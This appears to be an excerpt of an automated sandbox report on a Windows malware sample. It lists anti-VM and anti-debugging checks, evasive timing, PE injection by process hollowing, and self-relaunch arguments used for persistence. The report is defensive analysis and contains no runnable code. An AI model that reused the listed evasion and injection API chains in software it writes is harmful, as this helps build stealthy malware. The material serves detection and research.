          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmpAAA2.tmp.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1052
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-45714
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe TID: 6828Thread sleep time: -900000s >= -30000s
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe TID: 7472Thread sleep count: 181 > 30
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D11718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00D11754h1_2_00D11718
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00D129E2
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_00410160
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_0040F730
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,6_2_0040FB98
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D12B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00D12B8C
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeThread delayed: delay time: 900000
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000002.1298395918.00000000007B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.00000000006C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1508299132.0000000000639000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509191972.0000000000639000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1507924005.0000000000639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR
          Source: HhVfIB.exe, 00000001.00000003.1304081456.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, HhVfIB.exe, 00000001.00000003.1304165922.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, HhVfIB.exe, 00000001.00000002.1503916634.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, HhVfIB.exe, 00000001.00000002.1503916634.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000002.1298395918.0000000000791000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000002.1298395918.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000003.1288361584.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.00000000008D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: HhVfIB.exe, 00000001.00000002.1503916634.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000002.1298395918.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000003.1288361584.00000000007D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000003.1355371317.00000000008F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5P]
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000848000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000003.1355780671.00000000008F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7H]
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5H\
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeAPI call chain: ExitProcess graph end nodegraph_0-48530
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeAPI call chain: ExitProcess graph end nodegraph_0-48532
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeAPI call chain: ExitProcess graph end nodegraph_1-1027
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeAPI call chain: ExitProcess graph end nodegraph_6-45716
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0215471C rdtsc 0_2_0215471C
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00414D00 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00414D00
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00409685 _putc,__wrename,GetBinaryTypeW,GetConsoleAliasExesA,BuildCommDCBAndTimeoutsW,GetNumberFormatA,GetBinaryTypeW,GetConsoleAliasExesA,BuildCommDCBAndTimeoutsW,GetNumberFormatA,WriteConsoleOutputCharacterA,FindNextVolumeMountPointA,FillConsoleOutputCharacterW,GetNamedPipeHandleStateA,SetProcessShutdownParameters,GetConsoleAliasesLengthW,GetFileSizeEx,OpenFileMappingW,OpenWaitableTimerW,CharUpperW,GetLastError,CharUpperW,GetLastError,EnumSystemLocalesA,GetSystemTimeAdjustment,MoveFileWithProgressW,GetCommState,EnumSystemLocalesA,GetSystemTimeAdjustment,DebugBreak,MoveFileWithProgressW,GetCommState,CreateMailslotW,WriteConsoleInputA,GetConsoleAliasExesLengthA,SetComputerNameA,GlobalGetAtomNameW,AllocConsole,CreateIoCompletionPort,GetConsoleCP,FreeEnvironmentStringsA,LockFile,SetProcessPriorityBoost,SetProcessPriorityBoost,ConvertFiberToThread,QueryDepthSList,DeleteCriticalSection,FreeEnvironmentStringsA,ConvertFiberToThread,QueryDepthSList,DeleteCriticalSection,GetThreadContext,OpenMutexW,GetThreadContext,OpenMutexW,WriteConsoleW,DebugBreak,LoadLibraryA,lstrlenA,EnumResourceTypesW,FlushConsoleInputBuffer,SetThreadAffinityMask,SetEvent,OutputDebugStringW,ReadConsoleInputW,GetPrivateProfileIntW,CreateActCtxA,GetPrivateProfileStringW,GetOEMCP,CopyFileA,InterlockedExchangeAdd,WaitForDebugEvent,SetConsoleScreenBufferSize,GetConsoleAliasExesLengthA,0_2_00409685
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00416B40 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_00416B40
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_004ED044 mov eax, dword ptr fs:[00000030h]0_2_004ED044
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021530A3 push dword ptr fs:[00000030h]0_2_021530A3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F0042 push dword ptr fs:[00000030h]0_2_021F0042
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021390A3 push dword ptr fs:[00000030h]9_2_021390A3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D0042 push dword ptr fs:[00000030h]9_2_021D0042
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_007B90A3 push dword ptr fs:[00000030h]10_2_007B90A3
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02310042 push dword ptr fs:[00000030h]10_2_02310042
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004278D5 GetProcessHeap,6_2_004278D5
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00414D00 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00414D00
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_004111D0 SetUnhandledExceptionFilter,0_2_004111D0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_004182A0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004182A0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00410340 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00410340
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004329EC
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004329BB SetUnhandledExceptionFilter,6_2_004329BB

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_021F0110
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeMemory written: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeMemory written: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeMemory written: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeMemory written: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeMemory written: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeMemory written: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_022180F6 cpuid 0_2_022180F6
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: GetLocaleInfoA,0_2_0041E8E0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _putc,__wrename,GetBinaryTypeW,GetConsoleAliasExesA,BuildCommDCBAndTimeoutsW,GetNumberFormatA,GetBinaryTypeW,GetConsoleAliasExesA,BuildCommDCBAndTimeoutsW,GetNumberFormatA,WriteConsoleOutputCharacterA,FindNextVolumeMountPointA,FillConsoleOutputCharacterW,GetNamedPipeHandleStateA,SetProcessShutdownParameters,GetConsoleAliasesLengthW,GetFileSizeEx,OpenFileMappingW,OpenWaitableTimerW,CharUpperW,GetLastError,CharUpperW,GetLastError,EnumSystemLocalesA,GetSystemTimeAdjustment,MoveFileWithProgressW,GetCommState,EnumSystemLocalesA,GetSystemTimeAdjustment,DebugBreak,MoveFileWithProgressW,GetCommState,CreateMailslotW,WriteConsoleInputA,GetConsoleAliasExesLengthA,SetComputerNameA,GlobalGetAtomNameW,AllocConsole,CreateIoCompletionPort,GetConsoleCP,FreeEnvironmentStringsA,LockFile,SetProcessPriorityBoost,SetProcessPriorityBoost,ConvertFiberToThread,QueryDepthSList,DeleteCriticalSection,FreeEnvironmentStringsA,ConvertFiberToThread,QueryDepthSList,DeleteCriticalSection,GetThreadContext,OpenMutexW,GetThreadContext,OpenMutexW,WriteConsoleW,DebugBreak,LoadLibraryA,lstrlenA,EnumResourceTypesW,FlushConsoleInputBuffer,SetThreadAffinityMask,SetEvent,OutputDebugStringW,ReadConsoleInputW,GetPrivateProfileIntW,CreateActCtxA,GetPrivateProfileStringW,GetOEMCP,CopyFileA,InterlockedExchangeAdd,WaitForDebugEvent,SetConsoleScreenBufferSize,GetConsoleAliasExesLengthA,0_2_00409685
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_02230AB6
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_0221C8B7
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_0222394D
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_022249EA
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_02223F87
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_0043404A
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,6_2_00438178
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_00440116
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004382A2
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: GetLocaleInfoW,_GetPrimaryLen,6_2_0043834F
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,6_2_00438423
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: EnumSystemLocalesW,6_2_004387C8
